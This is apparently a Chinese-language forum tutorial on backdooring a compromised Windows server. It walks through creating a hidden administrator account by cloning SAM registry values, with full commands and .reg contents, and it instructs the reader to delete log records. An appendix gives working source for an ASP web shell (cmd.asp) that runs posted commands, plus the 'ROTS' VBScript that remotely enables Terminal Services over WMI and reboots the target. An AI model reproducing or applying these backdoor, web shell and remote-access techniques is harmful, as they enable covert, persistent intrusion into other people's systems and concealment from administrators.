建立一个隐藏的管理员帐号作为后门.及 一个asp后门建立一个隐藏的管理员帐号作为后门.
先建立 InternetUser$ 用户
c:\>net user InternetUser$ password123 /add
//后面加$ 是为了使在 控制台下用 net user 看不到.
然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单”安全”->”权限” 添加自己现在登录的帐户或组,
把”权限”->”完全控制”->”允许”打上勾,然后确定.
(比如刚才我们用guest登录,但它已经是administrators组的了,因此需要把ADMINISTRATORS组的也改为允许
完全控制,而且下面的键,Domains,account,user都要逐级这样做.但如果前面没有更改guest用户的默认组,这
里就没必要这么麻烦,一级一级的了)这样就可以直接读取本地sam的信息
现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$
查看默认键值为”0x3f1″ 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ 为InternetUser$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的”F”的值,比如这个例子中如下
“F”=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
把其复制后,打开3f1.reg,找到”F”的值,将其删除,然后把上面的那段粘贴.
打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
“F”=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
“V”=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
37,f1,02,cf,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
保存后,将InternetUser$用户删除
c:\>net user InternetUser$ /delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单”安全”->”权限” 删除刚才
添加的用户(比如刚才刚才是用的guest,而且改了Administrators组的设置,所以与前面对应,Administratos
组也要改,而且SAM下面的键,Domains,account,user都要逐级这样做,但如果前面没有改guest用户的默认组,
这里没必要这么麻烦,一级一级的了).
这样,我们就建立了一个在控制台用 net user 和”计算机管理”中都看不到的帐户InternetUser$,但是不能改
密码,一改密码就会在”计算机管理”中看到.需要注意的一点是,每次登录(不论是不是克隆的),都最好注销掉,
而不是直接关闭窗口,否则在”终端服务管理器”中会看到,而且管理员登录后注销时,可能会发现一个问题就是
,怎么会是”注销InternetUser$…”!!! (我克隆了两个帐号,测试的,没有测试过Administrators)
然后是记录清理,由于整个过程有下载的过程被记录,因此,运行logfiles,删除相关文件中的记录即可.
本人水平糟糕,一定有错误和遗漏的地方,这文都改了N次,所以望高手批评指正.
附录:
————————————————–
以下是asp后门,存为 cmd.asp
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> “”) Then
‘ — Use a poor man’s pipe … a temp file — ‘
szTempFile = “C:\” & oFileSys.GetTempName( )
Call oScript.Run (“cmd.exe /c ” & szCMD & ” > ” & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<% If (IsObject(oFile)) Then ' -- Read the output from our command and remove the temp file -- ' On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %>
———————————————————————-
以下是开终端的脚本,引自caozhe(草哲) 的<<一次简单的3389入侵过程 >>,把它存为rots.vbeon error resume next set outstreem=wscript.stdout set instreem=wscript.stdin if (lcase(right(wscript.fullname,11))="wscript.exe") then set objShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) wscript.quit end if if wscript.arguments.count<3 then usage() wscript.echo "Not enough parameters." wscript.quit end if ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) if wscript.arguments.count>3 then port=wscript.arguments(3) else port=3389 end if if not isnumeric(port) or port<1 or port>65000 then wscript.echo "The number of port is error." wscript.quit end if if wscript.arguments.count>4 then reboot=wscript.arguments(4) else reboot="" end if usage() outstreem.write "Conneting "&ipaddress&" ...." set objlocator=createobject("wbemscripting.swbemlocator") set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) showerror(err.number) objswbemservices.security_.privileges.add 23,true objswbemservices.security_.privileges.add 18,true outstreem.write "Checking OS type...." set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem") for each objinstoscaption in colinstoscaption if instr(objinstoscaption.caption,"Server")>0 then wscript.echo "OK!" else wscript.echo "OS type is "&objinstoscaption.caption outstreem.write "Do you want to cancel setup?[y/n]" strcancel=instreem.readline if lcase(strcancel)<>"n" then wscript.quit end if next outstreem.write "Writing into registry ...." set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get ("stdregprov") HKLM=&h80000002 HKU=&h80000003 with objinstreg .createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- Tcp","PortNumber",port end with showerror(err.number) rebt=lcase(reboot) flag=0 if rebt="/r" or rebt="-r" or rebt="\r" then flag=2 if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 if flag<>0 then outstreem.write "Now, reboot target...." strwqlquery="select * from win32_operatingsystem where primary='true'" set colinstances=objswbemservices.execquery(strwqlquery) for each objinstance in colinstances objinstance.win32shutdown(flag) next showerror(err.number) else wscript.echo "You need to reboot target."&vbcrlf&"Then," end if wscript.echo "You can logon terminal services on "&port&" later. Good luck!" function showerror(errornumber) if errornumber Then wscript.echo "Error 0x"&cstr(hex(err.number))&" ." if err.description <> "" then wscript.echo "Error description: "&err.description&"." end if wscript.quit else wscript.echo "OK!" end if end function function usage() wscript.echo string(79,"*") wscript.echo "ROTS v1.05" wscript.echo "Remote Open Terminal services Script, by 草哲" wscript.echo "Welcome to visite www.5458.net" wscript.echo "Usage:" wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]" wscript.echo "port: default number is 3389." wscript.echo "/r: auto reboot target." wscript.echo "/fr: auto force reboot target." wscript.echo string(79,"*")&vbcrlf end function